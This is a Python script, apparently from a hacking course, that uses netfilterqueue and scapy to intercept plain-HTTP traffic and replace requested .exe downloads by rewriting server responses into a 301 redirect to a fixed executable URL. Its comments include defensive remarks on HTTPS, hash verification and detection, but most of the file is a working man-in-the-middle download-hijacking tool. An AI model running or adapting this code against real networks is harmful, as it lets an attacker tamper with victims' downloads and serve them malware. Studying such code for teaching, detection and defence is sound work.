- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- ack_list = []  # TCP ACK numbers taken from port-80 requests whose payload contains 'exe'; process_packet compares response sequence numbers against it and removes an entry once it matches
- def process_packet(packet):
- # Callback for each packet taken from the netfilter queue: parses it with scapy and, for TCP port 80 traffic, records requests whose payload contains 'exe' and overwrites the payload of the matching response with an HTTP 301 redirect.
- # Both the match and the rewrite work on the cleartext Raw payload, so they depend on the download travelling over unencrypted HTTP; serving downloads over HTTPS and verifying the signature or published hash of a fetched executable are the usual mitigations.
- # Detection angle: a 301 to an unrelated host in answer to a request for an executable over plain HTTP is the visible artefact of this rewrite -- NOTE(review): confirm against captured traffic before relying on it as a rule.
- # packet.get_payload() returns the queued packet's raw bytes; wrapping them in scapy.IP() yields a parsed packet whose layers and fields can be read and modified.
- scapy_packet = scapy.IP(packet.get_payload())
- # only packets that carry a Raw layer (application payload) are inspected
- if scapy_packet.haslayer(scapy.Raw):
- if scapy_packet[scapy.TCP].dport == 80:  # destination port 80: client-to-server HTTP request
- if 'exe' in scapy_packet[scapy.Raw].load:  # plain substring test over the whole payload
- print('[+] exe Request')
- ack_list.append(scapy_packet[scapy.TCP].ack)  # remember the ACK number; it is later compared with the sequence number of port-80 responses
- elif scapy_packet[scapy.TCP].sport == 80:  # source port 80: server-to-client HTTP response
- if scapy_packet[scapy.TCP].seq in ack_list:  # sequence number equals a recorded ACK number
- ack_list.remove(scapy_packet[scapy.TCP].seq)  # entry is dropped once it has matched
- print('[+] Replacing file')
- scapy_packet[scapy.Raw].load = 'HTTP/1.1 301 Moved Permanently\nLocation: https://www.rarlab.com/rar/wrar591ru.exe\n\n'  # payload replaced by a redirect response with a fixed Location header
- del scapy_packet[scapy.IP].len  # length and checksum fields are deleted so scapy recomputes them when the packet is rebuilt
- del scapy_packet[scapy.IP].chksum
- del scapy_packet[scapy.TCP].chksum
- packet.set_payload(str(scapy_packet))  # write the serialised scapy packet back as the queued packet's payload
- packet.accept()  # release the packet from the queue so it is forwarded
- queue = netfilterqueue.NetfilterQueue()
- # bind to the netfilter queue so packets that iptables places in it are delivered to this process
- # process_packet is the callback executed for every packet held in the queue
- # 0 is the queue number chosen in the iptables rule; on a host under investigation, an iptables rule feeding an NFQUEUE together with a process bound to that queue is an artefact worth checking
- queue.bind(0, process_packet)
- queue.run()  # blocks and dispatches queued packets to the callback